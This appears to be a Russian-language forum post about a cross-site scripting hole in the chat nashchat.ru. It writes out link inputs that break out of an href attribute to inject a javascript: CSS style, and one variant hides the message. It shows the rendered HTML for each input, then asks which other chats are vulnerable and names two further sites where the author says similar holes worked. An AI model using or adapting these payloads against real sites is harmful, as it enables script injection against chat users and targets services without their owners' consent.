в чате nashchat.ru нашёл уязвимость: если пишешь что-то типа </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">http://www.some.ru[/QUOTE]<span id='postcolor'> то это преобразуется в ссылку. В чате отоброжается как: </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><a href="http://www.somechat.ru">http://www.somechat.ru</a> [/QUOTE]<span id='postcolor'> А если так: </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">http://www.some.ru"style="background:url(javascript:alert()) [/QUOTE]<span id='postcolor'> А чтоб твоё сообщение не было видно: </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">http://www.somechat.ru"style="background:url(javascript:alert())"aaa=`>[/QUOTE]<span id='postcolor'> Тогда в чате отображается как: </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><a href="http://www.somechat.ru"style="background:url(javascript:alert())"aaa=`>">http://www.somechat.ru"style="background:url(javascript:alert())"aaa=`></a> [/QUOTE]<span id='postcolor'> Проблема в том, что в скрипте нельзя использовать пробелы(& не пропускается). Сейчас баг исправили, но я думаю что такую фигню можно сделать на некоторых других чатах. (Ни кто не знает на каких? ) "'`<>\%&
Большинство чатов фильтруют кавычку в ссылках, поэтому это не работает. Но иногда прокатывает, например вот здесь я находил подобную уязвимость http://cafe.chanson.ru и здесь http://join.chillout.net.ru/join.thtml
